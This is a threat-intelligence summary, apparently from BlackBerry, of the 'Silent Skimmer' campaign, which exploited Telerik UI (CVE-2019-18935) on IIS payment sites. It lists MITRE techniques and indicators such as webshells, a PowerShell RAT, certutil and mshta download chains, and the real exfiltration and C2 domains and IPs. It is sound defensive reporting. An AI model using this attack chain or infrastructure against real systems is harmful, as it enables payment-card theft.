BlackBerry researchers identify a financially motivated campaign, dubbed “Silent Skimmer,” targeting online payment infrastructure across APAC and NALA with web-server compromises to steal payment data. The operation leverages vulnerabilities in web applications, a suite of post-exploitation tools, and a modular C2/hosting network (including HTTP File Servers and fast flux) to scrape and exfiltrate user payment details. Hashtags: #SilentSkimmer #Godzilla #TelerikUI #CVE2019-18935 #IIS #PowerShellRAT #CobaltStrike
Keypoints
- Silent Skimmer targets payment-processing websites and IIS-hosted web apps in APAC and North America, operating for over a year.
- Initial access is achieved by exploiting web applications (notably CVE-2019-18935) to gain access and deploy post-exploitation tools.
- Attackers deploy obfuscated JavaScript (compiled.js, jquery.hoverIntent.js, checkout.js) to scrape payment data and exfiltrate it via HTTP requests.
- Tools on the attacker’s HTTP File Server (HFS) include BadPotato, Godzilla webshells, PowerShell RAT (server.ps1), HTA downloaders, and Cobalt Strike beacons.
- Exfiltration is staged through fast flux infrastructure and domains such as www.krispykreme.one and nigntboxcdn.com.
- The campaign shifts focus from APAC toward Canada/USA, adapting network infrastructure (VPS in various locations, NAT traversal via RFP) to evade detection.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploitation of CVE-2019-18935 can result in remote code execution. The initial payload is a .NET assembly DLL generated using ihoney’s CVE-2019-18935 implementation.
- [T1105] Ingress Tool Transfer – The HTA file performs an ingress tool transfer via certutil.exe to download server.ps1 from 4.216.137.19.
- [T1059.001] Command and Scripting Interpreter: Command-Line – Pivoting to PowerShell, server.ps1 is a remote access tool that allows an attacker to control a victim’s computer remotely.
- [T1083] File and Directory Discovery – The attackers check inetpubwwwroot for specific files during the intrusion.
- [T1218.005] Signed Binary Proxy Execution: Mshta – The malicious DLL uses Mshta.exe to execute an HTML Application (MsMsp.hta) directly from an external IP.
- [T1068] Exploitation for Privilege Escalation – Privilege escalation is achieved by manipulating access tokens.
- [T1134] Access Token Manipulation – Privilege escalation via token manipulation is described in the campaign.
- [T1105] Ingress Tool Transfer – See above; the VBScript/Mshta chain downloads and loads additional payloads.
- [T1071.001] Web Protocols – C2 communications occur over HTTP/HTTPS, including the hardcoded C2 and HTTP File Server usage.
- [T1041] Exfiltration – Payment data is exfiltrated to remote servers after being processed and encoded.
- [T1027] Obfuscated/Compressed Files and Information – The attackers use obfuscated JavaScript files to hide exfiltration logic.
- [T1090] Proxy – Fast Reverse Proxy (RFP) and NAT traversal techniques are used to expose internal resources to the Internet.
Indicators of Compromise
- [Hash] ae89f5aa5c2dc71f4d86d9018000e92940558f3e5fe18542f48dea3b607c7d3b – server.ps1 (Appendix 1)
- [Hash] 1afd47f1e914bde661778966334270c4e3c47b88cbad8ca24babbe1220ac2204 – win.ps1 (Appendix 1)
- [Hash] 810b0ff0eebadc4d7f0c44f1d321121d55a477bd1a92d1ec89314a81b4c3601f – One.ps1 (Appendix 1)
- [Domain] www.krispykreme.one/Check.ashx – Payment data exfiltration destination
- [Domain] hxxps://cdn.nigntboxcdn.com/Nigntboxcdngetdata.php – Payment data exfiltration destination
- [IP] 52.253.105.171 – IP used to host MsMsp.hta/serve content
- [IP] 157.254.194.232 – Source for modified jquery.hoverIntent.js during intrusion
- [IP] 4.216.137.19 – Server hosting server.ps1 download
- [Domain] tk.tktktkcscscs.com – Hardcoded C2 domain in PowerShell RAT